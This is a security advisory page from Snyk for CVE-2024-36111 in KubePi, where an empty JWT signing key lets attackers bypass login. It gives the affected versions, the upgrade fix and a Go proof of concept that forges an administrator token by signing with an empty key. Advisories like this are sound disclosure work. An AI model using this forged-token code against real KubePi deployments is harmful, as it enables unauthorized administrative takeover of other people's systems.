Homepage

Improper Validation of Integrity Check Value Affecting github.com/1panel-dev/kubepi/internal/config package, versions >=1.6.3 <1.8.0

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (12th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-GOLANG-GITHUBCOM1PANELDEVKUBEPIINTERNALCONFIG-7572605
  • published29 Jul 2024
  • disclosed25 Jul 2024
  • creditibranch7
Report a new vulnerability Found a mistake?

Introduced: 25 Jul 2024

CVE-2024-36111  (opens in a new tab)
CWE-1259  (opens in a new tab)

How to fix?

Upgrade github.com/1Panel-dev/KubePi/internal/config to version 1.8.0 or higher.

Overview

Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value due to the JWT key handling during the configuration file reading process. An attacker can bypass login verification and directly take over the backend by exploiting the empty key used in JWT token generation.

PoC

package main

import (
    "fmt"
    "github.com/kataras/iris/v12/middleware/jwt"
    "time"
)

var jwtMaxAge = 100000 * time.Minute

type UserProfile struct {
    Name                string              `json:"name"`
    NickName            string              `json:"nickName"`
    Email               string              `json:"email"`
    Language            string              `json:"language"`
    ResourcePermissions map[string][]string `json:"resourcePermissions"`
    IsAdministrator     bool                `json:"isAdministrator"`
    Mfa                 Mfa                 `json:"mfa"`
}

type Mfa struct {
    Enable   bool   `json:"enable"`
    Secret   string `json:"secret"`
    Approved bool   `json:"approved"`
}

func main() {
    jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
    test := map[string][]string{}
    profile := UserProfile{
        Name:                "admin",
        NickName:            "Administrator",
        Email:               "support@fit2cloud.com",
        Language:            "zh-CN",
        ResourcePermissions: test,
        IsAdministrator:     true,
        Mfa: Mfa{
            Secret:   "",
            Enable:   false,
            Approved: false,
        },
    }
    nonejwt, _ := jwtSigner.Sign(profile)
    fmt.Println(string(nonejwt))
}

CVSS Scores

version 4.0
version 3.1